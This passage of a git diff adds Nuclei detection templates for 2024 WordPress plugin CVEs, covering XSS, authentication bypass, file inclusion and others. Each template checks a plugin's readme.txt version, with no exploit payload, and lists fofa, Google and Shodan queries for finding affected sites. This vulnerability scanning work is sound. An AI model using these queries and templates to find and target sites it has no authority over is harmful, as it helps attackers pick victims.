"{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.30') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43303.yaml b/poc/cve/CVE-2024-43303.yaml new file mode 100644 index 0000000000..37ec25785f --- /dev/null +++ b/poc/cve/CVE-2024-43303.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43303 + +info: + name: > + White Label CMS <= 2.7.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The White Label CMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8069e16d-a68a-4c72-934f-f79e50777565?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43303 + metadata: + fofa-query: "wp-content/plugins/white-label-cms/" + google-query: inurl:"/wp-content/plugins/white-label-cms/" + shodan-query: 'vuln:CVE-2024-43303' + tags: cve,wordpress,wp-plugin,white-label-cms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/white-label-cms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "white-label-cms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43306.yaml b/poc/cve/CVE-2024-43306.yaml new file mode 100644 index 0000000000..e3a07bc0b4 --- /dev/null +++ b/poc/cve/CVE-2024-43306.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43306 + +info: + name: > + WP-Lister Lite for eBay <= 3.6.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP-Lister Lite for eBay plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a76ded81-4c78-4054-9a26-7e215285a2b6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43306 + metadata: + fofa-query: "wp-content/plugins/wp-lister-for-ebay/" + google-query: inurl:"/wp-content/plugins/wp-lister-for-ebay/" + shodan-query: 'vuln:CVE-2024-43306' + tags: cve,wordpress,wp-plugin,wp-lister-for-ebay,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-lister-for-ebay/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-lister-for-ebay" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43307.yaml b/poc/cve/CVE-2024-43307.yaml new file mode 100644 index 0000000000..7947deb8bd --- /dev/null +++ b/poc/cve/CVE-2024-43307.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43307 + +info: + name: > + Structured Content <= 1.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Structured Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/908e4755-e439-4714-b0cb-3fc546c5ac63?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43307 + metadata: + fofa-query: "wp-content/plugins/structured-content/" + google-query: inurl:"/wp-content/plugins/structured-content/" + shodan-query: 'vuln:CVE-2024-43307' + tags: cve,wordpress,wp-plugin,structured-content,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/structured-content/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "structured-content" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43308.yaml b/poc/cve/CVE-2024-43308.yaml new file mode 100644 index 0000000000..fe3a475cf8 --- /dev/null +++ b/poc/cve/CVE-2024-43308.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43308 + +info: + name: > + Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b1ff70-7e37-4f74-bd72-ecda81d13d83?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43308 + metadata: + fofa-query: "wp-content/plugins/gutentor/" + google-query: inurl:"/wp-content/plugins/gutentor/" + shodan-query: 'vuln:CVE-2024-43308' + tags: cve,wordpress,wp-plugin,gutentor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gutentor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43309.yaml b/poc/cve/CVE-2024-43309.yaml new file mode 100644 index 0000000000..1cb82b3803 --- /dev/null +++ b/poc/cve/CVE-2024-43309.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43309 + +info: + name: > + WP Telegram Widget and Join Link <= 2.1.27 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Telegram Widget and Join Link plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff77089-c6c9-49af-8b08-0977a526fa23?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43309 + metadata: + fofa-query: "wp-content/plugins/wptelegram-widget/" + google-query: inurl:"/wp-content/plugins/wptelegram-widget/" + shodan-query: 'vuln:CVE-2024-43309' + tags: cve,wordpress,wp-plugin,wptelegram-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wptelegram-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wptelegram-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.27') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43311.yaml b/poc/cve/CVE-2024-43311.yaml new file mode 100644 index 0000000000..3111d8327f --- /dev/null +++ b/poc/cve/CVE-2024-43311.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43311 + +info: + name: > + Login As Users <= 1.4.2 - Authentication Bypass + author: topscoder + severity: critical + description: > + The Login As Users plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.2. This is due to the plugin not properly verifying that a user switching back to a user is authorized to do so. This makes it possible for unauthenticated attackers to access other users accounts which can be administrators. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a0d7a9-374b-430d-a7e5-3c7cdaff5785?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43311 + metadata: + fofa-query: "wp-content/plugins/login-as-users/" + google-query: inurl:"/wp-content/plugins/login-as-users/" + shodan-query: 'vuln:CVE-2024-43311' + tags: cve,wordpress,wp-plugin,login-as-users,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-as-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43313.yaml b/poc/cve/CVE-2024-43313.yaml new file mode 100644 index 0000000000..6214149fd1 --- /dev/null +++ b/poc/cve/CVE-2024-43313.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43313 + +info: + name: > + FormFacade <= 1.3.2 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The FormFacade – WordPress plugin for Google Forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirectURL' parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0166c9-1349-45df-9e0f-ff4bc1a67c73?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43313 + metadata: + fofa-query: "wp-content/plugins/formfacade/" + google-query: inurl:"/wp-content/plugins/formfacade/" + shodan-query: 'vuln:CVE-2024-43313' + tags: cve,wordpress,wp-plugin,formfacade,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/formfacade/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "formfacade" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43318.yaml b/poc/cve/CVE-2024-43318.yaml new file mode 100644 index 0000000000..d6192f2441 --- /dev/null +++ b/poc/cve/CVE-2024-43318.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43318 + +info: + name: > + e2pdf <= 1.25.05 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The e2pdf plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.25.05 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f94a1671-11f8-4a05-b950-a068edf29f43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43318 + metadata: + fofa-query: "wp-content/plugins/e2pdf/" + google-query: inurl:"/wp-content/plugins/e2pdf/" + shodan-query: 'vuln:CVE-2024-43318' + tags: cve,wordpress,wp-plugin,e2pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/e2pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "e2pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.25.05') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43319.yaml b/poc/cve/CVE-2024-43319.yaml new file mode 100644 index 0000000000..a82622c375 --- /dev/null +++ b/poc/cve/CVE-2024-43319.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43319 + +info: + name: > + Flash & HTML5 Video <= 2.5.31 - Authenticated (Subscriber+) Information Exposure + author: topscoder + severity: low + description: > + The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.31 via the h5vp_export_data() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract potentially sensitive information from exports. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/604862d9-e032-4806-8a14-3e4ad0ae1ee2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43319 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-43319' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.31') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43321.yaml b/poc/cve/CVE-2024-43321.yaml new file mode 100644 index 0000000000..06ada2e77f --- /dev/null +++ b/poc/cve/CVE-2024-43321.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43321 + +info: + name: > + Team Showcase <= 1.22.23 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.22.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f702fef0-8f07-4c94-bbf7-394d66f9ddde?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43321 + metadata: + fofa-query: "wp-content/plugins/team/" + google-query: inurl:"/wp-content/plugins/team/" + shodan-query: 'vuln:CVE-2024-43321' + tags: cve,wordpress,wp-plugin,team,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/team/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "team" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.22.23') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43322.yaml b/poc/cve/CVE-2024-43322.yaml new file mode 100644 index 0000000000..6eee8716e4 --- /dev/null +++ b/poc/cve/CVE-2024-43322.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43322 + +info: + name: > + Zephyr Project Manager <= 3.3.100 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The Zephyr Project Manager plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.100 via the updateTaskStatus() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to edit task statuses that do not belong to them. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/98a73a02-33fa-4dd4-9606-3d35d58c2398?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43322 + metadata: + fofa-query: "wp-content/plugins/zephyr-project-manager/" + google-query: inurl:"/wp-content/plugins/zephyr-project-manager/" + shodan-query: 'vuln:CVE-2024-43322' + tags: cve,wordpress,wp-plugin,zephyr-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zephyr-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.100') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43327.yaml b/poc/cve/CVE-2024-43327.yaml new file mode 100644 index 0000000000..ed6825ee43 --- /dev/null +++ b/poc/cve/CVE-2024-43327.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43327 + +info: + name: > + Invite Anyone <= 1.4.7 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Invite Anyone plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b02613dc-8c31-4c86-b800-eb1039381e1f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43327 + metadata: + fofa-query: "wp-content/plugins/invite-anyone/" + google-query: inurl:"/wp-content/plugins/invite-anyone/" + shodan-query: 'vuln:CVE-2024-43327' + tags: cve,wordpress,wp-plugin,invite-anyone,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/invite-anyone/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "invite-anyone" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43328.yaml b/poc/cve/CVE-2024-43328.yaml new file mode 100644 index 0000000000..24b9c81d75 --- /dev/null +++ b/poc/cve/CVE-2024-43328.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43328 + +info: + name: > + EmbedPress <= 4.0.9 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + The EmbedPress – Embed PDF, 3D Flipbook, Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Audios, Google Maps in Gutenberg Block & Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.9 via the 'page_type' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a1b117-945f-49bc-9ea1-313afa93bf32?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43328 + metadata: + fofa-query: "wp-content/plugins/embedpress/" + google-query: inurl:"/wp-content/plugins/embedpress/" + shodan-query: 'vuln:CVE-2024-43328' + tags: cve,wordpress,wp-plugin,embedpress,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/embedpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "embedpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43335.yaml b/poc/cve/CVE-2024-43335.yaml new file mode 100644 index 0000000000..7617009a9c --- /dev/null +++ b/poc/cve/CVE-2024-43335.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43335 + +info: + name: > + Responsive Blocks – WordPress Gutenberg Blocks <= 1.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Responsive Blocks – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the taxonomy block in versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c894de0-2ea7-4002-9c26-0e3e59744a5e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43335 + metadata: + fofa-query: "wp-content/plugins/responsive-block-editor-addons/" + google-query: inurl:"/wp-content/plugins/responsive-block-editor-addons/" + shodan-query: 'vuln:CVE-2024-43335' + tags: cve,wordpress,wp-plugin,responsive-block-editor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-block-editor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-block-editor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43342.yaml b/poc/cve/CVE-2024-43342.yaml new file mode 100644 index 0000000000..767239ef86 --- /dev/null +++ b/poc/cve/CVE-2024-43342.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43342 + +info: + name: > + Ultimate Store Kit Elementor Addons <= 1.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Ultimate Store Kit Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51a4886b-2e15-4d91-b853-4a675120a9e9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43342 + metadata: + fofa-query: "wp-content/plugins/ultimate-store-kit/" + google-query: inurl:"/wp-content/plugins/ultimate-store-kit/" + shodan-query: 'vuln:CVE-2024-43342' + tags: cve,wordpress,wp-plugin,ultimate-store-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-store-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-store-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43344.yaml b/poc/cve/CVE-2024-43344.yaml new file mode 100644 index 0000000000..17820548d9 --- /dev/null +++ b/poc/cve/CVE-2024-43344.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43344 + +info: + name: > + Icegram <= 3.1.25 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Icegram plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.1.25 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/230f40c1-a8a9-4932-a3f1-ecddc52acca9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43344 + metadata: + fofa-query: "wp-content/plugins/icegram/" + google-query: inurl:"/wp-content/plugins/icegram/" + shodan-query: 'vuln:CVE-2024-43344' + tags: cve,wordpress,wp-plugin,icegram,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "icegram" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.25') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43345.yaml b/poc/cve/CVE-2024-43345.yaml new file mode 100644 index 0000000000..f880d6e5ca --- /dev/null +++ b/poc/cve/CVE-2024-43345.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43345 + +info: + name: > + Landing Page Builder <= 1.5.2.0 - Authenticated (Editor+) Local File Inlcusion + author: topscoder + severity: low + description: > + The Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.2.0. This makes it possible for authenticated attackers, with Editor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bacfa993-2fc1-43bc-b4f0-f463ba28b4ed?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-43345 + metadata: + fofa-query: "wp-content/plugins/page-builder-add/" + google-query: inurl:"/wp-content/plugins/page-builder-add/" + shodan-query: 'vuln:CVE-2024-43345' + tags: cve,wordpress,wp-plugin,page-builder-add,low 